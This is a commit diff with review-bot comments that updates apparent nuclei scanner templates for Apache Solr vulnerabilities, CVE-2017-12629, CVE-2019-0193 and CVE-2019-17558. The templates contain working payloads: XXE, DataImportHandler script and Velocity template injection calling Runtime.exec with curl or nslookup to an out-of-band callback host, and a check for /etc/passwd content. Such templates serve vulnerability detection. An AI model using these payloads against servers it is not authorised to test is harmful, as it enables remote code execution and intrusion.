commit
99f71a941c
|
@ -1,26 +1,36 @@
|
|||
id: CVE-2017-12629
|
||||
|
||||
info:
|
||||
name: Apache Solr <= 7.1 Remote Code Execution via SSRF
|
||||
name: Apache Solr <= 7.1 XML entity injection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
tags: cve,cve2017,solr,apache,rce,ssrf,oob
|
||||
tags: cve,cve2017,solr,apache,oob,xxe
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629
|
||||
- https://twitter.com/honoki/status/1298636315613974532/photo/1
|
||||
- https://twitter.com/honoki/status/1298636315613974532
|
||||
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
|
||||
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /solr/select?qt=%2Fconfig%2523%26&shards=127.0.0.1:8984/solq&stream.body=%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22nuclei%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%22%24%40%7Csh%22%2C%22.%22%2C%22echo%22%2C%22nslookup%22%2C%22%24%28whoami%29.{{interactsh-url}}%22%5D%7D%7D&wt=json&isShard=true&q=apple HTTP/1.1
|
||||
GET /solr/admin/cores?wt=json HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /solr/select?shards=127.0.0.1:8984/solr/update%23&commit=true HTTP/1.1
|
||||
GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the DNS Interaction
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "dns"
|
||||
- "http"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
internal: true
|
||||
name: core
|
||||
group: 1
|
||||
regex:
|
||||
- '"name"\:"(.*?)"'
|
|
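Review bot: The `info:` block of this template carries no `description`, unlike the CVE-2019-0193 template added in the same commit, so a reader cannot tell from the file what the `defType=xmlparser` request is testing for; add a short `description:` stating that the request submits a DOCTYPE with an external parameter entity pointing at the interactsh host and that the resulting HTTP callback is the positive signal. The reference list also deserves a look: both the `CVE-2017-12629-XXE` and `CVE-2017-12629-RCE` vulhub links appear in this hunk and only the XXE one matches the template's new name and `xxe` tag, but this rendering does not show which of the two survives on the new side. Since `{{core}}` is produced by an extractor declared after the requests and marked `internal: true`, a comment next to `name: core` such as `# first core name from /solr/admin/cores; the second request depends on it` would make that ordering dependency explicit.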
@ -0,0 +1,47 @@
|
|||
id: CVE-2019-0193
|
||||
|
||||
info:
|
||||
name: Apache Solr - DataImportHandler RCE
|
||||
description: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
|
||||
author: pdteam
|
||||
severity: critical
|
||||
refrense: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-0193
|
||||
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
|
||||
- https://paper.seebug.org/1009/
|
||||
tags: cve,cve2019,apache,rce,solr,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /solr/admin/cores?wt=json HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Language: en
|
||||
Connection: close
|
||||
|
||||
- |
|
||||
POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-type: application/x-www-form-urlencoded
|
||||
X-Requested-With: XMLHttpRequest
|
||||
|
||||
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
internal: true
|
||||
name: core
|
||||
group: 1
|
||||
regex:
|
||||
- '"name"\:"(.*?)"'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
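Review bot: The key `refrense: |` in this new template is a misspelling of `reference`, so the three URLs beneath it are not attached to the finding and a schema-strict validator would reject the file; change it to `reference: |`. The same typo appears in the CVE-2019-17558 section below (`refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558`). In the POST body, `core=test` is hard-coded while the request path uses `{{core}}` taken from the `/solr/admin/cores` extractor; either drop the form parameter or write `core={{core}}` so the two cannot disagree. A one-line comment above the `dataConfig=` request, e.g. `# DIH debug mode accepts the whole config, including <script>, from the request`, would tie the payload back to the description.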
@ -4,7 +4,7 @@ info:
|
|||
author: pikpikcu,madrobot
|
||||
severity: critical
|
||||
refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
|
||||
tags: cve,cve2019,apache,rce,solr
|
||||
tags: cve,cve2019,apache,rce,solr,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -15,15 +15,10 @@ requests:
|
|||
Connection: close
|
||||
|
||||
- |
|
||||
POST /solr/{{collection}}/config HTTP/1.1
|
||||
POST /solr/{{core}}/config HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Connection: close
|
||||
Content-Type: application/json
|
||||
Content-Length: 259
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
{
|
||||
"update-queryresponsewriter": {
|
||||
|
@ -37,25 +32,25 @@ requests:
|
|||
}
|
||||
|
||||
- |
|
||||
GET /solr/{{collection}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27nslookup%20example.com%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
|
||||
GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20http://{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- '"status"\:\{"(.*?)"\:\{"name"'
|
||||
name: collection
|
||||
group: 1
|
||||
internal: true
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Non-authoritative answer"
|
||||
- "example.com"
|
||||
condition: and
|
||||
name: core
|
||||
group: 1
|
||||
regex:
|
||||
- '"name"\:"(.*?)"'
|
||||
|
|
|
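Review bot: `Content-Length: 259` in the `/solr/{{core}}/config` request is a hard-coded value for a JSON body that is only partly visible in this hunk; if that body is edited the header goes stale and the request is truncated or rejected. As far as I know nuclei computes the length of raw request bodies itself unless `unsafe: true` is set, which this template does not appear to use, so the line can simply be removed. The `refrense:` key in this file's `info:` block is a typo for `reference` (also present in the CVE-2019-0193 file above). The `raw:` list containing the velocity request begins before this hunk, so the first request's body is outside the visible lines.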
@ -26,13 +26,14 @@ requests:
|
|||
Accept-Language: en
|
||||
Connection: close
|
||||
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- '"status"\:\{"(.*?)"\:\{"name"'
|
||||
internal: true
|
||||
name: core
|
||||
group: 1
|
||||
internal: true
|
||||
regex:
|
||||
- '"name"\:"(.*?)"'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -18,6 +18,7 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- '<title>Solr admin page</title>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
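Review bot: The added `type: status` matcher only narrows the result if `matchers-condition: and` is set on this `matchers:` list, and that key lies outside the visible lines (the hunk starts at line 18 of the file). Without it nuclei combines matchers with `or`, so any 200 response, not just one containing `<title>Solr admin page</title>`, would produce a finding. Please confirm the condition is present, i.e. `matchers-condition: and` directly above `matchers:`, or add it in this change.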
@ -24,18 +24,21 @@ requests:
|
|||
Accept-Language: en
|
||||
Connection: close
|
||||
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- '"status"\:\{"(.*?)"\:\{"name"'
|
||||
internal: true
|
||||
name: core
|
||||
group: 1
|
||||
internal: true
|
||||
regex:
|
||||
- '"name"\:"(.*?)"'
|
||||
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'regex("root:.*:0:0:", body_2)'
|
||||
condition: and
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
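Review bot: The `_2` suffixes in `status_code_2 == 200` and `regex("root:.*:0:0:", body_2)` bind the matcher to the position of the second raw request, which is outside this hunk, so a reader editing the request list would not see the dependency. Add a comment on the `dsl:` line such as `# _2 refers to the second raw request; keep the request order in sync` so that inserting or reordering requests is caught in review. Assuming the trailing `type: status` and `type: regex` entries are the old matchers the dsl replaces, `matchers-condition: and` above a single dsl matcher is redundant (it combines matchers, while `condition: and` already combines the two expressions) and can be dropped, or kept with a note if further matchers are planned.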